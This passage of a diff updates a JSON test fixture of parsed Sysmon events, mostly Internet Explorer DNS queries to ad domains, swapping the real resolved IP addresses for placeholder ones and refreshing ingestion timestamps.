Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802423900Z'/\u003e\u003cEventRecordID\u003e106\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.107\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecsm2waycm-atl.netmng.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 j2waycm.netmng.com;type: 5 j2waycm-us-wdc.netmng.com;::ffff:104.193.83.156;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802423900Z'/\u003e\u003cEventRecordID\u003e106\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.107\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecsm2waycm-atl.netmng.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 j2waycm.netmng.com;type: 5 j2waycm-us-wdc.netmng.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -5230,7 +5152,7 @@ "level": "information" }, "event": { - "ingested": "2021-06-14T13:23:14.741416100Z", + "ingested": "2021-12-09T13:50:23.456839900Z", "code": "4", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e4\u003c/EventID\u003e\u003cVersion\u003e3\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e4\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:38.011477000Z'/\u003e\u003cEventRecordID\u003e2\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:38.011\u003c/Data\u003e\u003cData Name='State'\u003eStarted\u003c/Data\u003e\u003cData Name='Version'\u003e9.01\u003c/Data\u003e\u003cData Name='SchemaVersion'\u003e4.20\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -5294,12 +5216,12 @@ "type": "CNAME" }, { - "data": "72.30.2.182", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "72.30.2.182" + "89.160.20.156" ] }, "network": { @@ -5315,13 +5237,13 @@ "pr-bh.ybp.yahoo.com" ], "ip": [ - "72.30.2.182" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741424500Z", + "ingested": "2021-12-09T13:50:23.456845700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802433000Z'/\u003e\u003cEventRecordID\u003e107\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.112\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epr-bh.ybp.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ds-pr-bh.ybp.gysm.yahoodns.net;::ffff:72.30.2.182;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802433000Z'/\u003e\u003cEventRecordID\u003e107\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.112\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epr-bh.ybp.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ds-pr-bh.ybp.gysm.yahoodns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -5381,12 +5303,12 @@ }, "answers": [ { - "data": "3.83.220.223", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "3.83.220.223" + "89.160.20.156" ] }, "network": { @@ -5401,13 +5323,13 @@ "ps.eyeota.net" ], "ip": [ - "3.83.220.223" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741433300Z", + "ingested": "2021-12-09T13:50:23.456852Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802441200Z'/\u003e\u003cEventRecordID\u003e108\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.113\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eps.eyeota.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:3.83.220.223;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802441200Z'/\u003e\u003cEventRecordID\u003e108\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.113\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eps.eyeota.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -5502,7 +5424,7 @@ "level": "information" }, "event": { - "ingested": "2021-06-14T13:23:14.741441900Z", + "ingested": "2021-12-09T13:50:23.456857700Z", "code": "1", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e1\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e1\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:38.011477000Z'/\u003e\u003cEventRecordID\u003e3\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:37.949\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ce01-5c8f-0000-0010c73e2a00}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4860\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\Sysmon.exe\u003c/Data\u003e\u003cData Name='FileVersion'\u003e9.01\u003c/Data\u003e\u003cData Name='Description'\u003eSystem activity monitor\u003c/Data\u003e\u003cData Name='Product'\u003eSysinternals Sysmon\u003c/Data\u003e\u003cData Name='Company'\u003eSysinternals - www.sysinternals.com\u003c/Data\u003e\u003cData Name='CommandLine'\u003eC:\\Windows\\Sysmon.exe\u003c/Data\u003e\u003cData Name='CurrentDirectory'\u003eC:\\Windows\\system32\\\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='LogonGuid'\u003e{42f11c3b-6e1a-5c8c-0000-0020e7030000}\u003c/Data\u003e\u003cData Name='LogonId'\u003e0x3e7\u003c/Data\u003e\u003cData Name='TerminalSessionId'\u003e0\u003c/Data\u003e\u003cData Name='IntegrityLevel'\u003eSystem\u003c/Data\u003e\u003cData Name='Hashes'\u003eSHA1=AC93C3B38E57A2715572933DBCB2A1C2892DBC5E\u003c/Data\u003e\u003cData Name='ParentProcessGuid'\u003e{42f11c3b-6e1a-5c8c-0000-0010f14d0000}\u003c/Data\u003e\u003cData Name='ParentProcessId'\u003e488\u003c/Data\u003e\u003cData Name='ParentImage'\u003eC:\\Windows\\System32\\services.exe\u003c/Data\u003e\u003cData Name='ParentCommandLine'\u003eC:\\Windows\\system32\\services.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -5583,17 +5505,17 @@ "type": "CNAME" }, { - "data": "204.2.197.201", + "data": "89.160.20.156", "type": "A" }, { - "data": "204.2.197.211", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "204.2.197.201", - "204.2.197.211" + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -5611,14 +5533,13 @@ "idpix.media6degrees.com" ], "ip": [ - "204.2.197.201", - "204.2.197.211" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741450700Z", + "ingested": "2021-12-09T13:50:23.456863700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802456000Z'/\u003e\u003cEventRecordID\u003e109\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.146\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eidpix.media6degrees.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 idpix.media6degrees.com.cdn.cloudflare.net;type: 5 map.media6degrees.com;type: 5 map.media6degrees.com.cdn.cloudflare.net;::ffff:204.2.197.201;::ffff:204.2.197.211;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802456000Z'/\u003e\u003cEventRecordID\u003e109\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.146\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eidpix.media6degrees.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 idpix.media6degrees.com.cdn.cloudflare.net;type: 5 map.media6degrees.com;type: 5 map.media6degrees.com.cdn.cloudflare.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -5682,11 +5603,11 @@ "type": "CNAME" }, { - "data": "172.217.10.1", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -5694,7 +5615,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -5702,7 +5623,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -5710,7 +5631,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -5719,14 +5640,14 @@ } ], "resolved_ip": [ - "172.217.10.1", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30" ] }, @@ -5743,21 +5664,21 @@ "tpc.googlesyndication.com" ], "ip": [ - "172.217.10.1", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741459300Z", + "ingested": "2021-12-09T13:50:23.456869600Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802466200Z'/\u003e\u003cEventRecordID\u003e110\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.146\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etpc.googlesyndication.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead-googlehosted.l.google.com;::ffff:172.217.10.1;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802466200Z'/\u003e\u003cEventRecordID\u003e110\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.146\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etpc.googlesyndication.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead-googlehosted.l.google.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -5858,7 +5779,7 @@ "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-06-14T13:23:14.741468300Z", + "ingested": "2021-12-09T13:50:23.456875800Z", "code": "1", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e1\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e1\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:38.011477000Z'/\u003e\u003cEventRecordID\u003e4\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:37.964\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ce01-5c8f-0000-00102c412a00}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e5028\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\wbem\\unsecapp.exe\u003c/Data\u003e\u003cData Name='FileVersion'\u003e6.3.9600.16384 (winblue_rtm.130821-1623)\u003c/Data\u003e\u003cData Name='Description'\u003eSink to receive asynchronous callbacks for WMI client application\u003c/Data\u003e\u003cData Name='Product'\u003eMicrosoft« Windows« Operating System\u003c/Data\u003e\u003cData Name='Company'\u003eMicrosoft Corporation\u003c/Data\u003e\u003cData Name='CommandLine'\u003eC:\\Windows\\system32\\wbem\\unsecapp.exe -Embedding\u003c/Data\u003e\u003cData Name='CurrentDirectory'\u003eC:\\Windows\\system32\\\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='LogonGuid'\u003e{42f11c3b-6e1a-5c8c-0000-0020e7030000}\u003c/Data\u003e\u003cData Name='LogonId'\u003e0x3e7\u003c/Data\u003e\u003cData Name='TerminalSessionId'\u003e0\u003c/Data\u003e\u003cData Name='IntegrityLevel'\u003eSystem\u003c/Data\u003e\u003cData Name='Hashes'\u003eSHA1=6DF8163A6320B80B60733F9D62E2F39B4B16B678\u003c/Data\u003e\u003cData Name='ParentProcessGuid'\u003e{42f11c3b-6e1b-5c8c-0000-00102f610000}\u003c/Data\u003e\u003cData Name='ParentProcessId'\u003e560\u003c/Data\u003e\u003cData Name='ParentImage'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='ParentCommandLine'\u003eC:\\Windows\\system32\\svchost.exe -k DcomLaunch\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -5928,11 +5849,11 @@ "type": "CNAME" }, { - "data": "162.248.19.147", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -5940,7 +5861,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -5948,7 +5869,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": 